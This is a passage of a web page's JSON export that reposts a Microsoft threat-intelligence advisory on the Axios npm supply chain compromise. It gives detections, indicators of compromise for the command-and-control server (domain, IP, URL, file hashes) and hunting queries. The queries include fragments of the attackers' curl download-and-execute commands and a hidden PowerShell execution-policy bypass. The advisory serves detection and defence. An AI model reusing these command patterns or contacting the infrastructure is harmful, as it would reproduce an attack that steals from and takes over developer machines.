as a legitimate Apple&nbsp;component&nbsp;to&nbsp;maintain&nbsp;stealthy execution.&nbsp;&nbsp;<\/td>\n<td><strong>Microsoft Defender for Endpoint<\/strong> <br \/>\u2013&nbsp;Trojan:MacOS\/Multiverze!rfn (Blocking)&nbsp; <br \/>\u2013&nbsp;Backdoor:MacOS\/TalonStrike.A!dha (Blocking)&nbsp; <br \/>\u2013&nbsp;Backdoor:MacOS\/Crosdomd.A (Blocking) <br \/>\u2013&nbsp;Behavior:MacOS\/SuspNukeSpedExec.B (Blocking) <br \/>\u2013&nbsp;Behavior:MacOS\/SuspiciousActivityGen.AE (Blocking)<\/td>\n<\/tr>\n<tr readability=\"7\">\n<td>Download and&nbsp;execution&nbsp;of payload&nbsp;&nbsp;<\/td>\n<td><strong>Microsoft Defender for Endpoint&nbsp;<\/strong><br \/>\u2013 Trojan:Script\/SuspObfusRAT.A (Blocking)&nbsp; <br \/>\u2013 Trojan:JS\/AxioRAT.DA!MTB (Blocking) <br \/>\u2013 Trojan:MacOS\/Multiverze!rfn (Blocking) <br \/>\u2013&nbsp;Behavior:MacOS\/SuspNukeSpedExec.B<br 
\/>\u2013&nbsp;Behavior:MacOS\/SuspiciousActivityGen.AE<br \/>\u2013&nbsp;Process launched in the background&nbsp; <br \/>\u2013&nbsp;Suspicious AppleScript activity&nbsp; <br \/>\u2013&nbsp;Suspicious script launched&nbsp; <br \/>\u2013&nbsp;Suspicious shell command execution&nbsp; <br \/>\u2013&nbsp;Suspicious file or content ingress&nbsp; <br \/>\u2013&nbsp;Executable permission added to file or directory&nbsp; <br \/>\u2013&nbsp;Suspicious file dropped and launched&nbsp;<\/td>\n<\/tr>\n<tr readability=\"10\">\n<td rowspan=\"2\">&nbsp; Execution (Linux)<\/td>\n<td>Download and execution of payload,&nbsp;<em>\/tmp\/ld.py<\/em>, a Python loader\/downloader used to fetch, decrypt, or launch&nbsp;additional&nbsp;malicious components.&nbsp;&nbsp;<\/td>\n<td><strong>Microsoft Defender for Endpoint&nbsp;<\/strong><br \/>\u2013&nbsp;Trojan:Python\/TalonStrike.C!dha (Blocking)<br \/>\u2013&nbsp;Backdoor:Python\/TalonStrike.C!dha (Blocking)<\/td>\n<\/tr>\n<tr readability=\"5\">\n<td>Download and execution of payload<\/td>\n<td><strong>Microsoft Defender for Endpoint&nbsp;<\/strong><br \/>\u2013 Trojan:Python\/TalonStrike.C!dha (Blocking) <br \/>\u2013&nbsp;Process launched in the background&nbsp; <br \/>\u2013&nbsp;Suspicious communication with a remote target&nbsp;<\/td>\n<\/tr>\n<tr readability=\"12\">\n<td rowspan=\"2\">&nbsp; Execution (Windows)<\/td>\n<td>Observed artifacts,&nbsp;<em>6202033.ps1<\/em>&nbsp;and&nbsp;<em>system.bat<\/em>,&nbsp;provided&nbsp;attackers persistent remote access, command execution, and follow\u2011on payload delivery on Windows system&nbsp;&nbsp;<\/td>\n<td><strong>Microsoft Defender for Endpoint<\/strong> <br \/>\u2013&nbsp;TrojanDownloader:PowerShell\/Powdow.VUE!MTB&nbsp;(Blocking) <br \/>\u2013&nbsp;Trojan:Win32\/Malgent&nbsp;(Blocking) <br \/>\u2013&nbsp;TrojanDownloader:PowerShell\/Crosdomd.B&nbsp;(Blocking) <br \/>\u2013&nbsp;TrojanDownloader:PowerShell\/Crosdomd.A&nbsp;(Blocking) <br 
\/>\u2013&nbsp;TrojanDownloader:BAT\/TalonStrike.F!dha&nbsp;(Blocking) <br \/>\u2013&nbsp;Backdoor:PowerShell\/TalonStrike.B!dha&nbsp;(Blocking)<\/td>\n<\/tr>\n<tr readability=\"8\">\n<td>Download and execution of payload, <em>6202033.ps1<\/em>.<\/td>\n<td><strong>Microsoft Defender for Endpoint<\/strong> <br \/>\u2013&nbsp;TrojanDownloader:PowerShell\/Powdow.VUE!MTB (Blocking)<br \/>\u2013 Trojan:Win32\/Malgent (Blocking) <br \/>\u2013 Behavior:Win32\/PSMasquerade.A<br \/>\u2013 Suspicious ASEP via registry key<br \/>\u2013 System executable renamed and launched <br \/>\u2013 Possible initial access from an emerging threat<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td>Defense evasion (macOS)<\/td>\n<td>Removal of indicators<\/td>\n<td><strong>Microsoft Defender for Endpoint<\/strong><br \/>\u2013 Suspicious path deletion<\/td>\n<\/tr>\n<tr readability=\"6\">\n<td>Command and control<\/td>\n<td>Use of the following network indicators for C2 communications:<br \/>C2 domain: <em>sfrclak[.]com<\/em><br \/>C2 IP: 142.11.206[.]73<br \/>C2 URL: <em>hxxp:\/\/sfrclak[.]com:8000\/6202033<\/em><\/td>\n<td><strong>Microsoft Defender for Endpoint network protection<\/strong> and <strong>Microsoft Defender SmartScreen<\/strong> block the malicious network indicators observed in the attack.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<h2 class=\"wp-block-heading\" id=\"indicators-of-compromise\">Indicators of compromise<\/h2>\n<figure class=\"wp-block-table\">\n<table class=\"has-fixed-layout\">\n<tbody readability=\"16.5\">\n<tr>\n<td><strong>Indicator<\/strong><\/td>\n<td><strong>Type<\/strong><\/td>\n<td><strong>Description<\/strong><\/td>\n<\/tr>\n<tr readability=\"3\">\n<td><code>sfrclak[.]com<\/code><\/td>\n<td>C2 domain<\/td>\n<td>Resolves to 142.11.206[.]73.<br \/>Registrar: NameCheap, Inc<\/td>\n<\/tr>\n<tr 
readability=\"3\">\n<td><code>142.11.206[.]73<\/code><\/td>\n<td>C2 IP<\/td>\n<td>Sapphire Sleet C2 IP.<br \/>Port 8000, HTTP<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td><code>hxxp:\/\/sfrclak[.]com:8000\/6202033<\/code><\/td>\n<td>C2 URL<\/td>\n<td>Static path across all variants; the platform is selected by the POST body, not the URL<\/td>\n<\/tr>\n<tr>\n<td><code>%TEMP%\\6202033.vbs<\/code><\/td>\n<td>Windows VBScript dropper<\/td>\n<td>Created by <code>node setup.js<\/code>; deleted after use<\/td>\n<\/tr>\n<tr readability=\"6\">\n<td><code>%TEMP%\\6202033.ps1<\/code><\/td>\n<td>Windows PowerShell payload<\/td>\n<td>Downloaded from C2, self-deleting <br \/>SHA-256: ed8560c1ac7ceb6983ba995124d5917dc1a00288912387a6389296637d5f815c <br \/>SHA-256: 617b67a8e1210e4fc87c92d1d1da45a2f311c08d26e89b12307cf583c900d101<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td><code>%PROGRAMDATA%\\system.bat<\/code><\/td>\n<td>Windows persistence file<\/td>\n<td>Created by the PowerShell RAT on first execution, alongside the <code>HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\MicrosoftUpdate<\/code> Run key<br \/>SHA-256: f7d335205b8d7b20208fb3ef93ee6dc817905dc3ae0c10a0b164f4e7d07121cd<\/td>\n<\/tr>\n<tr readability=\"3\">\n<td><code>C:\\ProgramData\\wt.exe<\/code><\/td>\n<td>Renamed PowerShell copy<\/td>\n<td>powershell.exe copied and renamed to look like Windows Terminal; used to run the downloaded .ps1 with a hidden window and execution-policy bypass<\/td>\n<\/tr>\n<tr readability=\"4\">\n<td><code>\/Library\/Caches\/com.apple.act.mond<\/code><\/td>\n<td>macOS binary<\/td>\n<td>SHA-256: <code>92ff08773995ebc8d55ec4b8e1a225d0d1e51efa4ef88b8849d0071230c9645a<\/code><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><code>\/tmp\/ld.py<\/code><\/td>\n<td>Linux loader<\/td>\n<td>SHA-256: <code>fcb81618bb15edfdedfb638b4c08a2af9cac9ecfa551af135a8402bf980375cf<\/code><\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><code>packages.npm.org\/product1<\/code><\/td>\n<td>C2 POST body (Windows)<\/td>\n<td>Platform selector sent as the POST body to C2<\/td>\n<\/tr>\n<tr readability=\"2\">\n<td><code>packages.npm.org\/product0<\/code><\/td>\n<td>C2 POST body (macOS)<\/td>\n<td>Platform selector sent as the POST body to 
C2<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<h2 class=\"wp-block-heading\" id=\"hunting-queries\">Hunting queries<\/h2>\n<h3 class=\"wp-block-heading\" id=\"microsoft-defender-xdr\">Microsoft Defender XDR<\/h3>\n<p class=\"wp-block-paragraph\">Microsoft Defender XDR customers can run the following <a href=\"https:\/\/learn.microsoft.com\/defender-xdr\/advanced-hunting-overview\">advanced hunting<\/a> queries to find related activity in their networks:<\/p>\n<p class=\"wp-block-paragraph\"><strong>Installed Node.js packages with malicious versions<\/strong><\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"9\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title>\nDeviceTvmSoftwareInventory\n| where (SoftwareName has \"axios\" and SoftwareVersion in (\"1.14.1\", \"0.30.4\"))\n    or (SoftwareName has \"plain-crypto-js\" and SoftwareVersion == \"4.2.1\")\n<\/pre>\n<\/div>\n<p class=\"wp-block-paragraph\"><strong>Detect the RAT dropper and subsequent download and execution<\/strong><\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"11\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title>\nCloudProcessEvents\n\/\/ Dropper: node setup.js launched from the malicious plain-crypto-js dependency\n| where (ProcessCurrentWorkingDirectory endswith '\/node_modules\/plain-crypto-js' and ProcessCommandLine has_all ('plain-crypto-js', 'node setup.js'))\n    \/\/ Linux loader fetched from the C2\n    or ProcessCommandLine has_all ('\/tmp\/ld.py', 'sfrclak.com:8000')\n<\/pre>\n<\/div>\n<p class=\"wp-block-paragraph\"><strong>Connection to known C2<\/strong><\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"8\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title>\nDeviceNetworkEvents\n| where Timestamp &gt; ago(2d)\n| where RemoteUrl contains \"sfrclak.com\"\n\/\/ RemotePort is an integer column, so compare it to a number rather than to a string\n| where RemotePort == 8000\n<\/pre>\n<\/div>\n<p class=\"wp-block-paragraph\"><strong>Curl execution to download the 
backdoor<\/strong><\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"25\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title>\nDeviceProcessEvents\n| where Timestamp &gt; ago(2d)\n\/\/ Windows: cmd.exe runs curl, then a hidden PowerShell payload that deletes itself\n| where (FileName =~ \"cmd.exe\" and ProcessCommandLine has_all (\"curl -s -X POST -d\", \"packages.npm.org\", \"-w hidden -ep\", \".ps1\", \"&amp; del\", \":8000\"))\n    \/\/ Linux: python loader started with nohup\n    or (ProcessCommandLine has_all (\"curl\", \"-d packages.npm.org\/\", \"nohup\", \".py\", \":8000\/\", \"&gt; \/dev\/null 2&gt;&amp;1\") and ProcessCommandLine contains \"python\")\n    \/\/ macOS: com.apple.act.mond binary\n    or (ProcessCommandLine has_all (\"curl\", \"-d packages.npm.org\/\", \"com.apple.act.mond\", \"http:\/\/\", \":8000\/\", \"&amp;&gt; \/dev\/null\"))\n<\/pre>\n<\/div>\n<h3 class=\"wp-block-heading\" id=\"microsoft-sentinel\">Microsoft Sentinel<\/h3>\n<p class=\"wp-block-paragraph\">Microsoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with \u2018TI map\u2019) to automatically match the indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the <a href=\"https:\/\/learn.microsoft.com\/azure\/sentinel\/sentinel-solutions-deploy\">Microsoft Sentinel Content Hub<\/a> to have the analytics rule deployed in their Sentinel workspace.<\/p>\n<p class=\"wp-block-paragraph\">The following queries use <a href=\"https:\/\/learn.microsoft.com\/azure\/sentinel\/normalization\">Sentinel Advanced Security Information Model (ASIM) functions<\/a> to hunt threats across both Microsoft first-party and third-party data sources. 
ASIM also supports deploying parsers to specific workspaces <a href=\"https:\/\/aka.ms\/DeployASIM\">from GitHub<\/a>, using an ARM template or manually.<\/p>\n<p class=\"wp-block-paragraph\"><strong>Detect network IP and domain indicators of compromise using ASIM<\/strong><\/p>\n<p class=\"wp-block-paragraph\">The following query checks IP address and domain IOCs across data sources supported by the ASIM network session parser.<\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"19\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title>\n\/\/ IP list and domain list - _Im_NetworkSession\nlet lookback = 30d;\nlet ioc_ip_addr = dynamic(['142.11.206.73']);\n\/\/ Bare host name only: DstDomain carries no scheme or port, so a URL-style term such as http:\/\/sfrclak.com would never match it\nlet ioc_domains = dynamic(['sfrclak.com']);\n_Im_NetworkSession(starttime=todatetime(ago(lookback)), endtime=now())\n| where DstIpAddr in (ioc_ip_addr) or DstDomain has_any (ioc_domains)\n| summarize imNWS_mintime=min(TimeGenerated), imNWS_maxtime=max(TimeGenerated), EventCount=count() by SrcIpAddr, DstIpAddr, DstDomain, Dvc, EventProduct, EventVendor\n<\/pre>\n<\/div>\n<p class=\"wp-block-paragraph\"><strong>Detect Web Sessions IP and domain indicators of compromise using ASIM<\/strong><\/p>\n<p class=\"wp-block-paragraph\">The following two queries check IP address and domain IOCs across data sources supported by the ASIM web session parser. Run them as separate queries: the first matches on destination IP, the second on the C2 URL.<\/p>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"19\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title>\n\/\/ IP list - _Im_WebSession\nlet lookback = 30d;\nlet ioc_ip_addr = dynamic(['142.11.206.73']);\n_Im_WebSession(starttime=todatetime(ago(lookback)), endtime=now())\n| where DstIpAddr in (ioc_ip_addr)\n| summarize imWS_mintime=min(TimeGenerated), imWS_maxtime=max(TimeGenerated), EventCount=count() by SrcIpAddr, DstIpAddr, Url, Dvc, EventProduct, EventVendor\n<\/pre>\n<\/div>\n<div class=\"wp-block-syntaxhighlighter-code \" readability=\"19\">\n<pre class=\"brush: plain; auto-links: false; gutter: false; title: ; quick-code: false; notranslate\" title>\n\/\/ Domain list - _Im_WebSession\nlet ioc_domains = dynamic([\"http:\/\/sfrclak.com:8000\", \"http:\/\/sfrclak.com\"]);\n_Im_WebSession (url_has_any = ioc_domains)\n<\/pre>\n<\/div>\n<h3 class=\"wp-block-heading\" id=\"microsoft-defender-for-cloud\">Microsoft Defender for Cloud<\/h3>\n<p class=\"wp-block-paragraph\"><strong>Possibly compromised packages<\/strong><\/p>\n<p class=\"wp-block-paragraph\">Microsoft Defender for Cloud customers can use <a href=\"https:\/\/learn.microsoft.com\/azure\/defender-for-cloud\/how-to-manage-cloud-security-explorer\">cloud security explorer<\/a> to surface possibly compromised software packages. The following screenshot represents a query that searches for container images with the <em>axios<\/em> or <em>plain-crypto-js<\/em> node packages.<\/p>\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/04\/image.webp\" alt class=\"wp-image-146299 webp-format\" srcset data-orig-src=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/04\/image.webp\"><\/figure>\n<h3 class=\"wp-block-heading\" id=\"threat-intelligence-reports\">Threat intelligence reports<\/h3>\n<p class=\"wp-block-paragraph\">Microsoft Defender XDR customers can use the following <a href=\"https:\/\/learn.microsoft.com\/defender-xdr\/threat-analytics\">threat analytics<\/a> reports in the Defender portal (requires license for at least one Defender XDR product) to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. 
These reports provide intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments:<\/p>\n<p class=\"wp-block-paragraph\">Microsoft Security Copilot customers can also use the <a href=\"https:\/\/learn.microsoft.com\/defender\/threat-intelligence\/security-copilot-and-defender-threat-intelligence?bc=%2Fsecurity-copilot%2Fbreadcrumb%2Ftoc.json&amp;toc=%2Fsecurity-copilot%2Ftoc.json#turn-on-the-security-copilot-integration-in-defender-ti\">Microsoft Security Copilot integration<\/a> in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the <a href=\"https:\/\/learn.microsoft.com\/defender\/threat-intelligence\/using-copilot-threat-intelligence-defender-xdr\">embedded experience<\/a> in the Microsoft Defender portal to get more information about this threat actor.<\/p>\n<h3 class=\"wp-block-heading\" id=\"microsoft-security-copilot\">Microsoft Security Copilot<\/h3>\n<p class=\"wp-block-paragraph\"><a href=\"https:\/\/www.microsoft.com\/en-us\/security\/business\/ai-machine-learning\/microsoft-security-copilot\">Microsoft Security Copilot<\/a> is <a href=\"https:\/\/learn.microsoft.com\/defender-xdr\/security-copilot-in-microsoft-365-defender\">embedded in Microsoft Defender<\/a> and provides security teams with AI-powered capabilities to summarize incidents, analyze files and scripts, summarize identities, use guided responses, and generate device summaries, hunting queries, and incident reports.<\/p>\n<p class=\"wp-block-paragraph\">Customers can also <a href=\"https:\/\/learn.microsoft.com\/defender-xdr\/security-copilot-agents-defender\">deploy AI agents<\/a>, including the following <a href=\"https:\/\/learn.microsoft.com\/copilot\/security\/agents-overview\">Microsoft Security Copilot agents<\/a>, to perform security tasks efficiently:<\/p>\n<p class=\"wp-block-paragraph\">Security Copilot is also available as a <a 
href=\"https:\/\/learn.microsoft.com\/en-us\/copilot\/security\/experiences-security-copilot\">standalone experience<\/a> where customers can perform specific security-related tasks, such as incident investigation, user analysis, and vulnerability impact assessment. In addition, Security Copilot offers <a href=\"https:\/\/learn.microsoft.com\/copilot\/security\/developer\/custom-agent-overview\">developer scenarios<\/a> that allow customers to build, test, publish, and integrate AI agents and plugins to meet unique security needs.<\/p>\n<h3 class=\"wp-block-heading\" id=\"learn-more\">Learn more<\/h3>\n<p class=\"wp-block-paragraph\">For the latest security research from the Microsoft Threat Intelligence community, check out the <a href=\"https:\/\/aka.ms\/threatintelblog\">Microsoft Threat Intelligence Blog<\/a>.<\/p>\n<p class=\"wp-block-paragraph\">To get notified about new publications and to join discussions on social media, follow us on <a href=\"https:\/\/www.linkedin.com\/showcase\/microsoft-threat-intelligence\">LinkedIn<\/a>, <a href=\"https:\/\/x.com\/MsftSecIntel\">X (formerly Twitter)<\/a>, and <a href=\"https:\/\/bsky.app\/profile\/threatintel.microsoft.com\">Bluesky<\/a>.<\/p>\n<p class=\"wp-block-paragraph\">To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the <a href=\"https:\/\/thecyberwire.com\/podcasts\/microsoft-threat-intelligence\">Microsoft Threat Intelligence podcast<\/a>.<\/p>\n<p>READ MORE <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2026\/04\/01\/mitigating-the-axios-npm-supply-chain-compromise\/\">HERE<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>On March 31, 2026, the popular HTTP client Axios experienced a supply chain attack, causing two newly published npm packages for version updates to download from command and control (C2) that Microsoft Threat Intelligence has attributed to the North Korean state actor Sapphire Sleet. 
Although the malicious versions are no longer available for download, since Axios is one of the most widely used HTTP clients in the JavaScript ecosystem, this compromise exposed hundreds to potentially millions of users.<br \/>\nThe post Mitigating the Axios npm supply chain compromise appeared first on Microsoft Security Blog. READ MORE HERE&#8230;<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"colormag_page_layout":"default_layout","footnotes":""},"categories":[276],"tags":[493,1247,10754,357],"class_list":["post-60413","post","type-post","status-publish","format-standard","hentry","category-microsoft-secure","tag-linux","tag-macos","tag-sleet","tag-windows"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v26.8 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Mitigating the Axios npm supply chain compromise 2026 | ThreatsHub Cybersecurity News<\/title>\n<meta name=\"description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Mitigating the Axios npm supply chain compromise 2026 | ThreatsHub Cybersecurity News\" \/>\n<meta property=\"og:description\" content=\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security &amp; Cyber Threats Analysis Hub. 
100% Free OSINT Threat Intelligent and Cybersecurity News.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/\" \/>\n<meta property=\"og:site_name\" content=\"ThreatsHub Cybersecurity News\" \/>\n<meta property=\"article:published_time\" content=\"2026-04-01T21:00:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"432\" \/>\n\t<meta property=\"og:image:height\" content=\"435\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"TH Author\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@threatshub\" \/>\n<meta name=\"twitter:site\" content=\"@threatshub\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"TH Author\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. 
reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"20 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/\"},\"author\":{\"name\":\"TH Author\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476\"},\"headline\":\"Mitigating the Axios npm supply chain compromise\",\"datePublished\":\"2026-04-01T21:00:00+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/\"},\"wordCount\":3448,\"publisher\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/04\/image.webp\",\"keywords\":[\"Linux\",\"macOS\",\"Sleet\",\"Windows\"],\"articleSection\":[\"Microsoft Secure\"],\"inLanguage\":\"en-US\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/\",\"url\":\"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/\",\"name\":\"Mitigating the Axios npm supply chain compromise 2026 | ThreatsHub Cybersecurity 
News\",\"isPartOf\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/04\/image.webp\",\"datePublished\":\"2026-04-01T21:00:00+00:00\",\"description\":\"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/#primaryimage\",\"url\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/04\/image.webp\",\"contentUrl\":\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/wp-content\/uploads\/2026\/04\/image.webp\"},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.threatshub.org\/blog\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Linux\",\"item\":\"https:\/\/www.threatshub.org\/blog\/tag\/linux\/\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Mitigating the Axios npm supply chain 
compromise\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#website\",\"url\":\"https:\/\/www.threatshub.org\/blog\/\",\"name\":\"ThreatsHub Cybersecurity News\",\"description\":\"%%focuskw%% Threat Intel \u2013 Threat Intel Services \u2013 CyberIntelligence \u2013 Cyber Threat Intelligence - Threat Intelligence Feeds - Threat Intelligence Reports - CyberSecurity Report \u2013 Cyber Security PDF \u2013 Cybersecurity Trends - Cloud Sandbox \u2013- Threat IntelligencePortal \u2013 Incident Response \u2013 Threat Hunting \u2013 IOC - Yara - Security Operations Center \u2013 SecurityOperation Center \u2013 Security SOC \u2013 SOC Services - Advanced Threat - Threat Detection - TargetedAttack \u2013 APT \u2013 Anti-APT \u2013 Advanced Protection \u2013 Cyber Security Services \u2013 Cybersecurity Services -Threat Intelligence Platform\",\"publisher\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/#organization\"},\"alternateName\":\"Threatshub.org\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.threatshub.org\/blog\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#organization\",\"name\":\"ThreatsHub.org\",\"alternateName\":\"Threatshub.org\",\"url\":\"https:\/\/www.threatshub.org\/blog\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg\",\"contentUrl\":\"https:\/\/www.threatshub.org\/blog\/coredata\/uploads\/2025\/05\/Threatshub_Favicon1.jpg\",\"width\":432,\"height\":435,\"caption\":\"ThreatsHub.org\"},\"image\":{\"@id\":\"https:\/\/www.threatshub.org\/blog\/#\/schema\/logo\/image\/\"},\"sameAs
\":[\"https:\/\/x.com\/threatshub\"]},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/12e0a8671ff89a863584f193e7062476\",\"name\":\"TH Author\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\/\/www.threatshub.org\/blog\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/066276f086d5155df79c850206a779ad368418a844da0182ce43f9cd5b506c3d?s=96&d=mm&r=g\",\"caption\":\"TH Author\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Mitigating the Axios npm supply chain compromise 2026 | ThreatsHub Cybersecurity News","description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 100% Free OSINT Threat Intelligent and Cybersecurity News.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.threatshub.org\/blog\/mitigating-the-axios-npm-supply-chain-compromise\/","og_locale":"en_US","og_type":"article","og_title":"Mitigating the Axios npm supply chain compromise 2026 | ThreatsHub Cybersecurity News","og_description":"ThreatsHub Cybersecurity News | ThreatsHub.org | Cloud Security & Cyber Threats Analysis Hub. 
